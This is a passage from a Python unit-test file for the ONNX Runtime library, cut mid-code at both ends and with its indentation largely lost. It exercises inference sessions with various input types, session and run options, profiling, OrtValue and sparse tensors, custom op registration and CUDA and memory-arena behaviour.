np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
# Skip this test for a "pure" DML onnxruntime python wheel.
# We keep this test enabled for instances where both DML and CUDA EPs are available
# (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence
# than DML and the nodes are assigned to only the CUDA EP (which supports this test).
if "DmlExecutionProvider" in available_providers and "CUDAExecutionProvider" not in available_providers:
print(
"Skipping testRunModelMultipleThreads as the DML EP does not support calling Run()"
" on different threads using the same session object."
)
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=available_providers_without_tvm,
)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue("CPU" in device or "GPU" in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"), providers=available_providers_without_tvm)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ["None", 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
        # Output Y has an unknown dimension.
self.assertEqual(output_shape, ["None", 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, "tensor(bool)")
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
        b_type = sess.get_inputs()[1].type
self.assertEqual(b_type, "tensor(bool)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(bool)")
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["Olá", "你好", "여보세요", "hello"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array([b"this", b"is", b"identity", b"test"]).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype("|S8"))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b"must", b"have", b"same", b"size"], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
expr = np.array([["must", "have"], ["same", "size"]], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=onnxrt.get_available_providers())
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {"input:0": a})
self.assertTrue("Model requires 2 inputs" in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path, providers=onnxrt.get_available_providers())
modelmeta = sess.get_modelmeta()
self.assertEqual("onnx-caffe2", modelmeta.producer_name)
self.assertEqual("squeezenet_old", modelmeta.graph_name)
self.assertEqual("", modelmeta.domain)
self.assertEqual("", modelmeta.description)
self.assertEqual("", modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {"X": x})
profile_file = sess.end_profiling()
tags = ["pid", "dur", "ts", "ph", "X", "name", "args"]
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue("[" in lines[0])
for i in range(1, len(lines) - 1):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue("]" in lines[-1])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
        # the default should be to enable all optimizations
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(
opt.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED,
)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt, providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {"input1:0": a, "input:0": b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"), providers=available_providers_without_tvm)
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "seq(tensor(float))")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(int64)")
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(
get_name("sequence_construct.onnx"),
providers=available_providers_without_tvm,
)
self.assertEqual(sess.get_inputs()[0].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[1].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "seq(tensor(int64))")
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)),
]
res = sess.run(
[output_name],
{
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)),
},
)
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(
get_name("sequence_insert.onnx"),
sess_options=opt,
providers=available_providers_without_tvm,
)
self.assertEqual(sess.get_inputs()[0].type, "seq(tensor(int64))")
self.assertEqual(sess.get_inputs()[1].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "seq(tensor(int64))")
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run(
[output_name],
{
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": [],
},
)
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ["ORT_LOAD_CONFIG_FROM_MODEL"] = str(1)
sess = onnxrt.InferenceSession(
get_name("model_with_valid_ort_config_json.onnx"),
providers=onnxrt.get_available_providers(),
)
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(
session_options.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL
) # default option (not from the ORT config)
self.assertEqual(
session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL,
) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ["ORT_LOAD_CONFIG_FROM_MODEL"] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(
get_name("abs_free_dimensions.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(
get_name("abs_free_dimensions.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
        invalid_key = "INVALID_KEY"
        with self.assertRaises(RuntimeError) as context:
            so.get_session_config_entry(invalid_key)
        self.assertTrue(
            "SessionOptions does not have configuration with key: " + invalid_key in str(context.exception)
)
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)
)
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=["CPUExecutionProvider"])
res = sess.run(
["Y"],
{"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)},
)
self.assertTrue(
np.array_equal(
res[0],
np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32),
)
)
def testSessionOptionsAddExternalInitializers(self):
# Create an external initializer data in OrtValue
# This initializer will replace the initializer with external data reference in the graph
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([0, 0, 1, 1]).astype(np.int64))
so = onnxrt.SessionOptions()
so.add_external_initializers(["Pads_not_on_disk"], [ortvalue_initializer])
# This should not throw
onnxrt.InferenceSession(
get_name("model_with_external_initializer_come_from_user.onnx"),
sess_options=so,
providers=["CPUExecutionProvider"],
)
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = "custom_op_library.dll"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = "libcustom_op_library.dylib"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = "./libcustom_op_library.so"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, sess_options=so1, providers=available_providers_without_tvm)
# Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3, 5)).astype(np.float32)
input_1 = np.zeros((3, 5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3, 5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, sess_options=so2, providers=available_providers_without_tvm)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, sess_options=so3, providers=available_providers_without_tvm)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, "cuda", 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testOrtValue_ghIssue9799(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
session = onnxrt.InferenceSession(
get_name("identity_9799.onnx"),
providers=onnxrt.get_available_providers(),
)
for seq_length in range(40, 200):
inps = np.ones((seq_length, 16, 7, 5, 3, 3)).astype(np.float32)
ort_val = onnxrt.OrtValue.ortvalue_from_numpy(inps, "cuda", 0)
upstreams_onnxrt = {"input": ort_val}
outs = session.run(output_names=["output"], input_feed=upstreams_onnxrt)[0]
self.assertTrue(np.allclose(inps, outs))
def testSparseTensorCooFormat(self):
cpu_device = onnxrt.OrtDevice.make("cpu", 0)
shape = [9, 9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
# Linear indices
indices = np.array([3, 5, 15], dtype=np.int64)
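# With linear COO indices, index = row * num_cols + col, so 3, 5 and 15 map to (0, 3), (0, 5) and (1, 6) in the 9x9 dense shape.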
sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, values, indices, cpu_device)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), "cpu")
# Get Data View on a numeric type.
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
# Run GC to test that values_ret still exhibits expected data
gc.collect()
self.assertTrue(np.array_equal(values, values_ret))
self.assertTrue(np.array_equal(indices, indices_ret))
# Test new Ortvalue interfaces
ort_value = onnxrt.OrtValue.ort_value_from_sparse_tensor(sparse_tensor)
sparse_tensor = ort_value.as_sparse_tensor()
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
gc.collect()
# Test string data on cpu only, need to subst values only
str_values = np.array(["xyz", "yxz", "zyx"], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, str_values, indices, cpu_device)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), "cpu")
# Get string values back
str_values_ret = str_sparse_tensor.values()
self.assertTrue(np.array_equal(str_values, str_values_ret))
# Check indices
str_indices_ret = str_sparse_tensor.as_coo_view().indices()
gc.collect()
self.assertFalse(str_indices_ret.flags.writeable)
self.assertTrue(np.array_equal(indices, str_indices_ret))
cuda_device = onnxrt.OrtDevice.make("cuda", 0)
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
# Test to_cuda
copy_on_cuda = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(copy_on_cuda.dense_shape(), shape)
self.assertEqual(copy_on_cuda.data_type(), "sparse_tensor(float)")
self.assertEqual(copy_on_cuda.device_name(), "cuda")
# Test that gpu copy would fail to copy to cuda
with self.assertRaises(RuntimeError):
copy_on_cuda.to_cuda(cuda_device)
# Test that string tensor copy would fail
with self.assertRaises(RuntimeError):
str_sparse_tensor.to_cuda(cuda_device)
else:
# No cuda available
with self.assertRaises(RuntimeError):
sparse_tensor.to_cuda(cuda_device)
def testSparseTensorCsrFormat(self):
cpu_device = onnxrt.OrtDevice.make("cpu", 0)
shape = [9, 9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
inner_indices = np.array([1, 1, 1], dtype=np.int64)
outer_indices = np.array([0, 1, 2, 3, 3, 3, 3, 3, 3, 3], dtype=np.int64)
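# CSR layout: values holds the non-zeros, inner_indices their column positions, and outer_indices the running row offsets (one entry per row plus one).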
sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(
shape, values, inner_indices, outer_indices, cpu_device
)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), "cpu")
# Test CSR(C) indices
inner_indices_ret = sparse_tensor.as_csrc_view().inner()
outer_indices_ret = sparse_tensor.as_csrc_view().outer()
self.assertFalse(inner_indices_ret.flags.writeable)
self.assertFalse(outer_indices_ret.flags.writeable)
gc.collect()
self.assertTrue(np.array_equal(inner_indices, inner_indices_ret))
self.assertTrue(np.array_equal(outer_indices, outer_indices_ret))
# Test with strings
str_values = np.array(["xyz", "yxz", "zyx"], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(
shape, str_values, inner_indices, outer_indices, cpu_device
)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), "cpu")
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
cuda_device = onnxrt.OrtDevice.make("cuda", 0)
cuda_sparse_tensor = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(cuda_sparse_tensor.device_name(), "cuda")
self.assertEqual(cuda_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(cuda_sparse_tensor.dense_shape(), shape)
self.assertEqual(cuda_sparse_tensor.data_type(), "sparse_tensor(float)")
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if not "CUDAExecutionProvider" in available_providers:
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [
("CUDAExecutionProvider", {"do_copy_in_default_stream": True}),
"CPUExecutionProvider",
]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2, 2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=["output"], input_feed={"shape": shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo(
"Cpu",
onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR,
0,
onnxrt.OrtMemType.DEFAULT,
)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1")
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so1,
providers=onnxrt.get_available_providers(),
)
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so2,
providers=onnxrt.get_available_providers(),
)
def testMemoryArenaShrinkage(self):
if platform.architecture()[0] == "32bit" or "ppc" in platform.machine() or "powerpc" in platform.machine():
# on x86 or ppc builds, the CPU allocator does not use an arena
print("Skipping testMemoryArenaShrinkage in 32bit or powerpc platform.")
else:
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess1 = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
input_name = sess1.get_inputs()[0].name
# Shrink CPU memory after execution
ro1 = onnxrt.RunOptions()
ro1.add_run_config_entry("memory.enable_memory_arena_shrinkage", "cpu:0")
self.assertEqual(
ro1.get_run_config_entry("memory.enable_memory_arena_shrinkage"),
"cpu:0",
)
sess1.run([], {input_name: x}, ro1)
available_providers = onnxrt.get_available_providers()
if "CUDAExecutionProvider" in available_providers:
sess2 = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
input_name = sess2.get_inputs()[0].name
# Shrink CPU and GPU memory after execution
ro2 = onnxrt.RunOptions()
ro2.add_run_config_entry("memory.enable_memory_arena_shrinkage", "cpu:0;gpu:0")
self.assertEqual(
ro2.get_run_config_entry("memory.enable_memory_arena_shrinkage"),
"cpu:0;gpu:0",
)
sess2.run([], {input_name: x}, ro2)
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
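# check_and_normalize_provider_args expands mixed provider specs (plain names or (name, options) tuples) into two parallel lists: provider names and string-valued option dicts.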
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
(
actual_providers,
actual_provider_options,
